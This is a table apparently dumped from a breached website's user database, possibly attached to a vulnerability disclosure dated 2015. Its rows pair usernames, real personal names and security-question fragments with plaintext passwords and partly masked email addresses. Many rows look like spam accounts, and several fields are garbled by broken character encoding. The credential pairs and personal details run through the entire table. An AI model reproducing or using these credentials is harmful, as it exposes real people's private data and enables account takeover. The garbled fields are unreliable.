| 327 | <blank> | 0 | What is your you | eojesmerfern | eojesmerfern | Db7c2ec! | bqloginadulttoys@**.**.**.** |
| 328 | <blank> | 0 | What is your you | rummeranib | rummeranib | 560Cf1c! | aakissadulttoys@**.**.**.** |
| 329 | <blank> | 0 | Where did you sp | ruilloryblan | ruilloryblan | 0A0dca3! | ackissadulttoys@**.**.**.** |
| 33 | <blank> | 0 | <blank> | ^\?84qg | zhuangzhao | 19841101 | <blank> |
| 330 | <blank> | 0 | <blank> | s\?8by\?8f? | wfr864390 | 864390 | <blank> |
| 331 | <blank> | 0 | <blank> | WN9 | rodine555 | 197041 | 274262962@**.**.**.** |
| 332 | <blank> | 0 | Where did you sp | tperoltadier | tperoltadier | 61477D9! | amlinkadulttoys@**.**.**.** |
| 333 | <blank> | 0 | Where did you sp | nkidsnorth | nkidsnorth | C8f60cf! | cpickadulttoys@**.**.**.** |
| 334 | <blank> | 0 | Where did you sp | aeinghramshayn | aeinghramshayn | 844Be58! | tbelievesex@**.**.**.** |
| 335 | <blank> | 0 | What is your you | eanibebust | eanibebust | A39d2c9! | cccheng2005@**.**.**.** |
| 336 | <blank> | 0 | What is your you | eunemil | eunemil | A8d6d8f! | chlichji@**.**.**.** |
| 337 | <blank> | 0 | Where did you sp | nekoningeldr | nekoningeldr | F4c6363! | xcjbob@**.**.**.** |
| 338 | <blank> | 0 | ?{\?b1[\?c6x | N%_\?d7~\?a2 | yzh7980 | yzh13687411374 | yzh7980@**.**.**.** |
| 339 | <blank> | 0 | name | Lam Wang | linalam | liza0267 | lina_lam@**.**.**.** |
| 34 | <blank> | 0 | <blank> | QI | fanxigung | 000000 | <blank> |
| 340 | <blank> | 0 | Where did you sp | akanozamaude | akanozamaude | F8c5a9e! | cfpickadulttoys@**.**.**.** |
| 341 | <blank> | 0 | N\?ca^tQ\?e0\\?81? | ?S\?ef_\?fb | akiwong | 1593572468 | <blank> |
| 342 | <blank> | 0 | What is your you | dnidag | dnidag | 41B2fc2! | brloginadulttoys@**.**.**.** |
| 343 | <blank> | 0 | What is your you | urawbaughwalt | urawbaughwalt | Fd3e08f! | wxy525@**.**.**.** |
| 344 | <blank> | 0 | What is your you | ibotwinickollie | ibotwinickollie | 17463D3! | cclinkadulttoys@**.**.**.** |
| 345 | <blank> | 0 | Where did you sp | cshopscanada | cshopscanada | 2E54b0e! | arkissadulttoys@**.**.**.** |
| 346 | <blank> | 0 | What is your you | asherrattevel | asherrattevel | C265171! | bconsaleadult@**.**.**.** |
| 347 | <blank> | 0 | Where did you sp | eparralesmajor | eparralesmajor | 17B2fad! | bkissadulttoys@**.**.**.** |
| 348 | <blank> | 0 | What is your you | leatwolerebe | leatwolerebe | 5921F15! | cppickadulttoys@**.**.**.** |
| 349 | <blank> | 0 | Where did you sp | llineslitting | llineslitting | Cc8a826! | xch12321@**.**.**.** |
| 35 | <blank> | 0 | wangfen | s\?8b? | wangfen | wangfen | yunfan10@**.**.**.** |
| 350 | <blank> | 0 | Where did you sp | hybrethsherr | hybrethsherr | Ac113db! | chymxy1980@**.**.**.** |
| 351 | <blank> | 0 | What is your you | ellheweymiche | ellheweymiche | Ca400ed! | x401493227@**.**.**.** |
| 352 | <blank> | 0 | What is your you | oilanodarr | oilanodarr | 2D2c824! | cbowd@**.**.**.** |
| 353 | <blank> | 0 | What is your you | ebecklerbran | ebecklerbran | Cfe29ea! | chuangha@**.**.**.** |
| 354 | <blank> | 0 | Where did you sp | vmarkevicsher | vmarkevicsher | D3ad571! | wuzhifu2007@**.**.**.** |
| 355 | <blank> | 0 | What is your you | iornijuds | iornijuds | 3B3dc21! | cmy4018888@**.**.**.** |
| 356 | <blank> | 0 | What is your you | oinazhocajacq | oinazhocajacq | Cc4aa41! | bdoncesex@**.**.**.** |
| 357 | <blank> | 0 | What is your you | vartgroverickh | vartgroverickh | D78b95f! | chlikeyou@**.**.**.** |
| 358 | <blank> | 0 | 123 | Q\?afe\?87p\?9c | xiaofwei | 852456fwei | <blank> |
| 359 | <blank> | 0 | O`r1b | Y\?da_\?d7m\?9b | aloha | aloha2 | <blank> |
| 36 | <blank> | 0 | bv\?84T
[W | N\?8efSs\?b2 | yukiko | 810221 | fs_gls@**.**.**.** |
| 360 | <blank> | 0 | What is your you | shankisonanto | shankisonanto | Dc2a35e! | tlinkadulttoys@**.**.**.** |
| 361 | <blank> | 0 | Where did you sp | cawrencetheo | cawrencetheo | 6Fc58a2! | chyatchinaqd@**.**.**.** |
| 362 | <blank> | 0 | What is your you | rsalenorthface | rsalenorthface | 79A1795! | clunch@**.**.**.** |
| 363 | <blank> | 0 | What is your you | ssamcclucavanne | ssamcclucavanne | 05985Ad! | chuanqisecai@**.**.**.** |
| 364 | <blank> | 0 | What is your you | thietory | thietory | 18D94ee! | chenzhui1985@**.**.**.** |
| 365 | <blank> | 0 | What is your you | nllmanissa | nllmanissa | Ee55750! | cnpsjx01@**.**.**.** |
| 366 | <blank> | 0 | What is your you | sxersonle | sxersonle | F7dc40c! | csbrightadult@**.**.**.** |
| 367 | <blank> | 0 | Where did you sp | ntobarntfili | ntobarntfili | 1Cbb443! | cbdjd54@**.**.**.** |
| 368 | <blank> | 0 | What is your you | yluskydelm | yluskydelm | 0D6a833! | jackza@**.**.**.** |
| 369 | <blank> | 0 | Where did you sp | eeggenewt | eeggenewt | 1E225a7! | xhtmxk@**.**.**.** |
| 37 | <blank> | 0 | bv\?84T
[Wf/N\?c0NH? | _ g ? | ABCD123456 | 123456 | <blank> |
| 370 | <blank> | 0 | What is your you | rjewelrycheap | rjewelrycheap | A147707! | cloginadulttoys@**.**.**.** |
| 371 | <blank> | 0 | my lover | OYgpSN | wish821129 | 821129 | <blank> |
| 372 | <blank> | 0 | <blank> | n8NCgC | damian | g2025468 | 21978063@**.**.**.** |
| 373 | <blank> | 0 | wife | Carlito G. Cheng | eichw777 | 571143888 | eichw777@**.**.**.** |
| 374 | <blank> | 0 | Where did you sp | dukang1010 | dukang1010 | D41d8cd! | dukang1010@**.**.**.** |
| 375 | <blank> | 0 | <blank> | \?85e\?87\?f0 | magicphilip | 040822 | global.key@**.**.**.** |
| 376 | <blank> | 0 | <blank> | ??SN | fssscyh | 785200 | <blank> |
| 377 | <blank> | 0 | <blank> | ?mN? | 00019998 | michigan2013 | <blank> |
| 378 | <blank> | 0 | 222 | k'?[\?81 | fsoyn893 | 159357 | <blank> |
| 379 | <blank> | 0 | 4 | ?b? | asd | nelson | <blank> |
| 38 | <blank> | 0 | <blank> | gN? | f%Y)q6q6 | 991223 | <blank> |
| 380 | <blank> | 0 | What is your you | budbud10 | budbud10 | F2bdbdc3 | imajbqy@**.**.**.** |
| 381 | <blank> | 0 | garethctc? | Cheung Ting Cheung | energypark | garethctc | energypark@**.**.**.** |
| 382 | <blank> | 0 | ?ZF | ?_\?b7^\?b7 | karn | 84karn84 | karn@**.**.**.** |
| 383 | <blank> | 0 | eiei | <blank> | eieimimi | 5201314 | eieimimi@**.**.**.** |
| 384 | <blank> | 0 | email password | Sau Yuen Wu | zoewu1128 | yuen1128 | zoewu1128@**.**.**.** |
| 385 | <blank> | 0 | <blank> | Wong Ching Leong | corinthian | cv929cv929 | <blank> |
| 386 | <blank> | 0 | e>k:?vfvcfwevq | ?t(e\?f8 | xkysky | a1122543 | ky212@**.**.**.** |
| 387 | <blank> | 0 | <blank> | s\?8bs\?b2s\?b2 | lingling | WLLwll0228 | <blank> |
| 388 | <blank> | 0 | What is your you | mlliamjere | mlliamjere | 9E6ba01d | chenxihao17@**.**.**.** |
| 389 | <blank> | 0 | Where did you sp | nakdennanc | nakdennanc | 381C3a1b | wxddt1984@**.**.**.** |
| 39 | <blank> | 0 | r6N\?b2v\?84T
[W | h\?85Y\?dc | qq450990737 | 89624782 | mason_victorman@**.**.**.** |
| 390 | <blank> | 0 | What is your you | ceverichscotl | ceverichscotl | 3A8e295c | cisolla@**.**.**.** |
| 391 | <blank> | 0 | home no. | UN\?ea | tangyi89 | 5382505tangyi | <blank> |
| 392 | <blank> | 0 | What is your you | oapichokgene | oapichokgene | 956Fab76 | jake834208@**.**.**.** |
| 393 | <blank> | 0 | who are you? | h>U\?86SN | tonyluan | 9157252 | <blank> |
| 394 | <blank> | 0 | bf/?? | S\?e4^\?fa? | gujianlong1984 | 393939 | <blank> |
| 395 | <blank> | 0 | Where did you sp | natonedb | natonedb | 7E50f06c | xhc123.45@**.**.**.** |
| 396 | <blank> | 0 | Where did you sp | fbelstaffjacket | fbelstaffjacket | E6275997 | cmj324@**.**.**.** |
| 397 | <blank> | 0 | Where did you sp | ehenewerksant | ehenewerksant | B2ba413e | wyutmrcwu_84@**.**.**.** |
| 398 | <blank> | 0 | <blank> | ?V eO | guer1988 | 040181 | <blank> |
| 399 | <blank> | 0 | Where did you sp | tkpretifred | tkpretifred | 604Aa33d | ccclong@**.**.**.** |
| 40 | <blank> | 0 | [fh! | s\?8be\?87_l | jige88888888 | 119119 | <blank> |
| 400 | <blank> | 0 | <blank> | iminifielange | iminifielange | Ac535af4 | wilseycalca@**.**.**.** |
| 401 | <blank> | 0 | What is your you | oeggiominhr | oeggiominhr | C022b393 | chowyoo2@**.**.**.** |
| 402 | <blank> | 0 | <blank> | lgrillomarc | lgrillomarc | Fb820840 | ma8412039660@**.**.**.** |
| 403 | <blank> | 0 | What is your you | guttingerrobe | guttingerrobe | 1Ba408e9 | jallkick@**.**.**.** |
| 404 | <blank> | 0 | Where did you sp | isacchiojama | isacchiojama | B68c4190 | tiandirencai2@**.**.**.** |
| 405 | <blank> | 0 | <blank> | ?e\?87? | 02029648 | wenlong | <blank> |
| 406 | <blank> | 0 | What is your you | knarskieddi | knarskieddi | 0F6a3013 | chj710115@**.**.**.**.cn |
| 407 | <blank> | 0 | Donde daci ? | CAMILO ESTRADA BOTER | CAMILO | cestrad5 | [email protected] |
| 408 | <blank> | 0 | <blank> | nsbivintobia | nsbivintobia | 1Dd130c3 | icruzlitrduy@**.**.**.** |
| 409 | <blank> | 0 | What is your you | eertsendain | eertsendain | 7016530F | ccav3000@**.**.**.** |
| 410 | <blank> | 0 | What is your you | aomargarimaur | aomargarimaur | 8Aafe4bf | chirsliu@**.**.**.** |
| 411 | <blank> | 0 | Where did you sp | jconejocass | jconejocass | F19dcd31 | ccb711105@**.**.**.** |
| 412 | <blank> | 0 | <blank> | oamalsomdore | oamalsomdore | 925504B3 | sanceslameda@**.**.**.** |
| 413 | <blank> | 0 | Where did you sp | enikenike | enikenike | 6A19a43c | lwbxinjirufen@**.**.**.** |
| 414 | <blank> | 0 | <blank> | ienskimarc | ienskimarc | 17959F00 | youqiukgt@**.**.**.** |
| 415 | <blank> | 0 | your birthday | gh[\?87e\?b0 | lucy998 | 987456lu | jadelucy@**.**.**.** |
| 416 | <blank> | 0 | live ? | _\?90y<R | fidkim627 | 23208765 | kim@**.**.**.** |
| 417 | <blank> | 0 | g r1n8b | OU | sunico | fysphwk | <blank> |
| 418 | <blank> | 0 | <blank> | rckrina | rckrina | A1653027 | fd37ccf45@**.**.**.** |
| 419 | <blank> | 0 | <blank> | asenthaleura | asenthaleura | C3d86d28 | zhwyfnaos@**.**.**.** |
| 420 | <blank> | 0 | <blank> | omovadomovado | omovadomovado | 8718C55d | tigerinowit@**.**.**.** |
| 421 | <blank> | 0 | <blank>



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确认时间:2015-11-11 10:31



